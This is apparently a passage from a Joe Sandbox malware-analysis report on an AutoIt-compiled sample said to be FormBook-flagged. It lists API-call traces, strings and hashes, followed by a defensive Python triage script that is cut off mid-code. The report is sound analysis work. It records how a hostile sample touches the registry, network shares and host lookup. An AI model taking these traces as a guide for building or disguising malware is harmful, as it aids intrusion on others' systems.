                                                                      • DeleteMenu.USER32(005D5890,00000005,00000000,000000F5,?,?), ref: 00572EF6
                                                                      • DeleteMenu.USER32(005D5890,00000004,00000000), ref: 00572EFE
                                                                      • DeleteMenu.USER32(005D5890,00000006,00000000), ref: 00572F06
                                                                      • DeleteMenu.USER32(005D5890,00000003,00000000), ref: 00572F0E
                                                                      • GetMenuItemCount.USER32(005D5890), ref: 00572F16
                                                                      • SetMenuItemInfoW.USER32(005D5890,00000004,00000000,00000030), ref: 00572F4C
                                                                      • GetCursorPos.USER32(?), ref: 00572F56
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00572F5F
                                                                      • TrackPopupMenuEx.USER32(005D5890,00000000,?,00000000,00000000,00000000), ref: 00572F72
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00572F7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                      • String ID:
                                                                      • API String ID: 3993528054-0
                                                                      • Opcode ID: d4af9bf0fe24099745ff584ba6e1547bdeb08d571e4dc40a40a254073aa9cfae
                                                                      • Instruction ID: fc1802bf661150913ba77f322d9cdc7652f62e24088adf70beb3cc9dbe54d14c
                                                                      • Opcode Fuzzy Hash: d4af9bf0fe24099745ff584ba6e1547bdeb08d571e4dc40a40a254073aa9cfae
                                                                      • Instruction Fuzzy Hash: 9C71D570600205BFEB219F55EC89FAABF68FF44314F148216F62DAA1E1C7715C54EB91
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 005888D7
                                                                      • CoInitialize.OLE32(00000000), ref: 00588904
                                                                      • CoUninitialize.OLE32 ref: 0058890E
                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00588A0E
                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00588B3B
                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,005A2C0C), ref: 00588B6F
                                                                      • CoGetObject.OLE32(?,00000000,005A2C0C,?), ref: 00588B92
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00588BA5
                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00588C25
                                                                      • VariantClear.OLEAUT32(?), ref: 00588C35
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                      • String ID: ,,Z
                                                                      • API String ID: 2395222682-2090448338
                                                                      • Opcode ID: c312e0f1161cad49fa401590363e0ebec18f2e1f2cc42ebfedc24ef2152c26e4
                                                                      • Instruction ID: 604e2bbac46273b4379a92634f9e674a85f7ace28d32872a17732bea6771c438
                                                                      • Opcode Fuzzy Hash: c312e0f1161cad49fa401590363e0ebec18f2e1f2cc42ebfedc24ef2152c26e4
                                                                      • Instruction Fuzzy Hash: BAC125B1608305AFD700EF64C88492ABBE9FF89348F40495DF98AEB251DB71ED05CB52
                                                                      APIs
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • _memset.LIBCMT ref: 0056786B
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005678A0
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005678BC
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005678D8
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00567902
                                                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0056792A
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00567935
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0056793A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 1411258926-22481851
                                                                      • Opcode ID: 4eef4cba9b40bf40b5c4cf4e5abe3ecffc7241e8f51b004fd4ab76f445b3d99d
                                                                      • Instruction ID: fd32cc4dea3eef4f8eb7189d4e5c2a22b3ff62d50adc24edc20d1120b9f7098e
                                                                      • Opcode Fuzzy Hash: 4eef4cba9b40bf40b5c4cf4e5abe3ecffc7241e8f51b004fd4ab76f445b3d99d
                                                                      • Instruction Fuzzy Hash: 2B410872C1462DAADF11EBA4DC99DEDBBB8FF58714F00442AF805A3161EB305D44CB90
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0058FDAD,?,?), ref: 00590E31
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 3964851224-909552448
                                                                      • Opcode ID: b15c3ac467510dcc5937a8f5a9a13fe990b30709e40dcd3d861d143cf3b053f8
                                                                      • Instruction ID: e2816690e0e2251f909d3fd368262138ced0523f54d9b6741e4dc4f5e36fa8e2
                                                                      • Opcode Fuzzy Hash: b15c3ac467510dcc5937a8f5a9a13fe990b30709e40dcd3d861d143cf3b053f8
                                                                      • Instruction Fuzzy Hash: 16412C3110034A8FDF14EF50E8A9AEE3FA4BF55340F152859FC565B2D2DB349A5ACB60
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0054E2A0,00000010,?,Bad directive syntax error,0059F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0056F7C2
                                                                      • LoadStringW.USER32(00000000,?,0054E2A0,00000010), ref: 0056F7C9
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      • _wprintf.LIBCMT ref: 0056F7FC
                                                                      • __swprintf.LIBCMT ref: 0056F81E
                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0056F88D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 1506413516-4153970271
                                                                      • Opcode ID: fee67be27c2bf6d9059d63d18a603a75a16316fb0bcc90c57808eb45ceee8e8a
                                                                      • Instruction ID: 88b7ba5887c75ae45b1d0b0b6897d9dd4e84f52f1645fbb1fea783c9225a669f
                                                                      • Opcode Fuzzy Hash: fee67be27c2bf6d9059d63d18a603a75a16316fb0bcc90c57808eb45ceee8e8a
                                                                      • Instruction Fuzzy Hash: F8216F3290421EEFDF11EF90CC0AEFE7B79BF18300F04086AF505660A1EA319A58DB51
                                                                      APIs
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                        • Part of subcall function 00517924: _memmove.LIBCMT ref: 005179AD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00575330
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00575346
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00575357
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00575369
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0057537A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_memmove
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2279737902-1007645807
                                                                      • Opcode ID: 9756b3d1dc79b699e7e7f0a1718d66f61e8dbd269ae7e40781d1845c6404238b
                                                                      • Instruction ID: 271052e4f8e0b1aaf122f84d27adbc331b41477ecc4d932b07d691cec1948f8d
                                                                      • Opcode Fuzzy Hash: 9756b3d1dc79b699e7e7f0a1718d66f61e8dbd269ae7e40781d1845c6404238b
                                                                      • Instruction Fuzzy Hash: 3611632195012E7DE720BAB5DC49EFF6EBCFBD5B44F0008197415920E1FEA00D84C5A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 208665112-3771769585
                                                                      • Opcode ID: ad0463bc77b0a74ff21d1bbf8ca672e9607da49f79217c42631c041a1088d6bc
                                                                      • Instruction ID: b4adb6d5ce2c32f617eb375c9c005f7ad8b0d16852b89365d4fc10024fa224b6
                                                                      • Opcode Fuzzy Hash: ad0463bc77b0a74ff21d1bbf8ca672e9607da49f79217c42631c041a1088d6bc
                                                                      • Instruction Fuzzy Hash: B511D5316001156FCB24AB70AC4AEEA7FBCFB52711F0445B6F449D60A1EF719986AB50
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00574F7A
                                                                        • Part of subcall function 0053049F: timeGetTime.WINMM(?,75A4B400,00520E7B), ref: 005304A3
                                                                      • Sleep.KERNEL32(0000000A), ref: 00574FA6
                                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00574FCA
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00574FEC
                                                                      • SetActiveWindow.USER32 ref: 0057500B
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00575019
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00575038
                                                                      • Sleep.KERNEL32(000000FA), ref: 00575043
                                                                      • IsWindow.USER32 ref: 0057504F
                                                                      • EndDialog.USER32(00000000), ref: 00575060
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: 4327b9c868cc84353c61affc99c1ea4a011c438aa355213b9b8b972aeb61fbbc
                                                                      • Instruction ID: 52e89078353864943458b006b19e23ef91352d3646b8ae7e928c347c529f51ad
                                                                      • Opcode Fuzzy Hash: 4327b9c868cc84353c61affc99c1ea4a011c438aa355213b9b8b972aeb61fbbc
                                                                      • Instruction Fuzzy Hash: 6921BE74202601AFE7205F20FC88A263F69FB64345B45502BF00AC12B5EB658D5CFB61
                                                                      APIs
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • CoInitialize.OLE32(00000000), ref: 0057D5EA
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0057D67D
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0057D691
                                                                      • CoCreateInstance.OLE32(005A2D7C,00000000,00000001,005C8C1C,?), ref: 0057D6DD
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0057D74C
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 0057D7A4
                                                                      • _memset.LIBCMT ref: 0057D7E1
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0057D81D
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0057D840
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0057D847
                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0057D87E
                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0057D880
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                      • String ID:
                                                                      • API String ID: 1246142700-0
                                                                      • Opcode ID: 393939ac7e1e12b21b1a3b5e1be32e6fc34321172c0712a4adb2bd3b3b108cc8
                                                                      • Instruction ID: aa57cb360e4d786a98174f8c0d1cf1cb1a23be78820fd914cf373abf6c47aa87
                                                                      • Opcode Fuzzy Hash: 393939ac7e1e12b21b1a3b5e1be32e6fc34321172c0712a4adb2bd3b3b108cc8
                                                                      • Instruction Fuzzy Hash: 02B1FD75A00109AFDB04DFA4D898DAEBBB9FF88314F148469F909EB261DB30ED45DB50
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 0056C283
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0056C295
                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0056C2F3
                                                                      • GetDlgItem.USER32(?,00000002), ref: 0056C2FE
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0056C310
                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0056C364
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0056C372
                                                                      • GetWindowRect.USER32(00000000,?), ref: 0056C383
                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0056C3C6
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0056C3D4
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0056C3F1
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0056C3FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: 29b5d7a0111c91da82a1342023320dbcc113b55f8abc5a6dcd68ee25f1b4f591
                                                                      • Instruction ID: 08c4c4098f9accd75bdfe266ece9cef68db0a6390bdf7044bd34795fffbf2a55
                                                                      • Opcode Fuzzy Hash: 29b5d7a0111c91da82a1342023320dbcc113b55f8abc5a6dcd68ee25f1b4f591
                                                                      • Instruction Fuzzy Hash: E3515D71B00205AFDB18CFA9DD99AAEBBBAFB98310F14852DF515D7290D7709D448B10
                                                                      APIs
                                                                        • Part of subcall function 00511B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512036,?,00000000,?,?,?,?,005116CB,00000000,?), ref: 00511B9A
                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005120D3
                                                                      • KillTimer.USER32(-00000001,?,?,?,?,005116CB,00000000,?,?,00511AE2,?,?), ref: 0051216E
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0054BCA6
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005116CB,00000000,?,?,00511AE2,?,?), ref: 0054BCD7
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005116CB,00000000,?,?,00511AE2,?,?), ref: 0054BCEE
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005116CB,00000000,?,?,00511AE2,?,?), ref: 0054BD0A
                                                                      • DeleteObject.GDI32(00000000), ref: 0054BD1C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: 00a1c15aef203ca2f22bfba153bc493b87c80e25a20a0c9b0db7a0e20f9e4ad1
                                                                      • Instruction ID: e3d6026f41076dacb790ed507bed07de4c47bff01dae2ea3c58944c08487ad7b
                                                                      • Opcode Fuzzy Hash: 00a1c15aef203ca2f22bfba153bc493b87c80e25a20a0c9b0db7a0e20f9e4ad1
                                                                      • Instruction Fuzzy Hash: 0F619E30502A01DFEB359F14D94CBA97FF1FF64316F20492AE1428AA70D775ACA4EB50
                                                                      APIs
                                                                        • Part of subcall function 005125DB: GetWindowLongW.USER32(?,000000EB), ref: 005125EC
                                                                      • GetSysColor.USER32(0000000F), ref: 005121D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 8742a5ee5e913e13e619faceb1b6af0fc8393ef73fdbe03fbd4a85a8f3e5b0a5
                                                                      • Instruction ID: 2add01b6b7bc3fafed86b6d145fda348025c62023748e2c8890bf9ce6a66b861
                                                                      • Opcode Fuzzy Hash: 8742a5ee5e913e13e619faceb1b6af0fc8393ef73fdbe03fbd4a85a8f3e5b0a5
                                                                      • Instruction Fuzzy Hash: 9441B135100140ABEB215F28DC88BFD3F65FB56331F294266FE658A1E1C7318C96EB61
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,0059F910), ref: 0057A90B
                                                                      • GetDriveTypeW.KERNEL32(00000061,005C89A0,00000061), ref: 0057A9D5
                                                                      • _wcscpy.LIBCMT ref: 0057A9FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2820617543-1000479233
                                                                      • Opcode ID: 62f54001015fa08e881b0e058dabc2cd58caab2735b4c536a3e0b32e4c40dd9f
                                                                      • Instruction ID: 70f40be1dfe149b7381cf87a621ffbd83ccab8523b676e5141b9718359b0c705
                                                                      • Opcode Fuzzy Hash: 62f54001015fa08e881b0e058dabc2cd58caab2735b4c536a3e0b32e4c40dd9f
                                                                      • Instruction Fuzzy Hash: 96518B311083029BD704EF14E89AAAEBFA5BFC4304F14882DF599572A2DB319949DB53
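Most of the function summaries above are stock AutoIt3 interpreter code rather than the script's own logic: the runtime-error dialog (`Line %d (File "%s"):`, `>>>AUTOIT SCRIPT<<<`), the `mciSendStringW` calls on the `PlayMe` alias behind SoundPlay(), the `all$cdrom$fixed$network$ramdisk$removable$unknown` table behind DriveGetType(). The one block without a runtime marker here is the `gethostname`/`gethostbyname`/`inet_ntoa` routine with its `0.0.0.0` fallback, which is what an analyst triaging a FormBook-flagged AutoIt build would look at first. The Python below is an added example, not part of the Joe Sandbox report and not AutoIt or FormBook code: it parses blocks in the format shown on this page, decodes the `.sdmp` dump names (the page-protection and `MEM_IMAGE` readings assume the fifth and seventh fields are the winnt.h constants, which is consistent with 0x20 on the .text dump, 0x02 on the header and 0x04 on the .data dump; the process-index and phase readings are labelled assumptions, and three fields are left raw), and tags blocks carrying the runtime markers quoted above. The marker list and the sample excerpt are constructed from the blocks on this page.

```python
"""Triage Joe Sandbox function-summary blocks from an AutoIt-compiled sample (added example)."""
import re
from dataclasses import dataclass, field

# winnt.h constants; fields 5 and 7 of the .sdmp names on this page take exactly these
# values (0x20 for .text, 0x02 for the PE header, 0x04 for .data; 0x01000000 = MEM_IMAGE).
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED"}

# Substrings that belong to the AutoIt3 interpreter itself, not to the compiled script.
AUTOIT_RUNTIME_MARKERS = (
    ">>>AUTOIT SCRIPT<<<",           # marker of the embedded compiled script
    'Line %d (File "%s"):',          # interpreter runtime-error dialog
    "Bad directive syntax error",
    "PlayMe",                        # mciSendString alias used by SoundPlay()
    "cdrom$fixed$network$ramdisk",   # DriveGetType() result table
)

# "• Api.MODULE(args), ref: 0056F7C2"  or  "• Api.MODULE ref: 0057500B"
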